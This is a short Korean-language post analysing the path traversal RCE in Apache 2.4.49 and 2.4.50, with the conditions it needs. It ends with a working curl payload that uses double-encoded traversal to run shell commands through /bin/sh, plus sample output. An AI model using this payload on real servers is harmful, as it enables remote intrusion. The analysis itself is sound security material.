
Apache 서버용 원격 코드 실행(RCE) 익스플로잇. 영향받는 버전: Apache 2.4.49, Apache 2.4.50
제 생각에는 이 RCE에 취약한 것은 '특별한' 설정뿐입니다.
당신이 본 '임의 파일 읽기' 익스플로잇도 마찬가지입니다.
두 CVE는 실제로 거의 동일한 경로 탐색 취약점입니다(두 번째 것은 첫 번째 것에 대한 불완전한 수정입니다).
경로 탐색은 매핑된 URI(예: Apache 지시문 "Alias" 또는 "ScriptAlias"를 통해)에서만 작동합니다. DocumentRoot만으로는 충분하지 않습니다.
"/cgi-bin/"는 기본적으로 매핑되며(ScriptAlias), 그래서 경로 탐색 문자열 앞에 사용되는 것입니다.
또한 ScriptAlias는 주어진 디렉터리의 모든 내용을(Apache의 경우) 파일 확장자와 무관하게 Exec로 표시합니다.
1/ mod_cgi 활성화(기본값은 아니지만 쉬움)
2/ 대상 바이너리는 +x여야 함(/bin/sh의 기본값)
3/ /bin 또는 /에 대한 Apache 권한이 부여되어야 함(기본값이 아니며 어렵고 비현실적)\
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)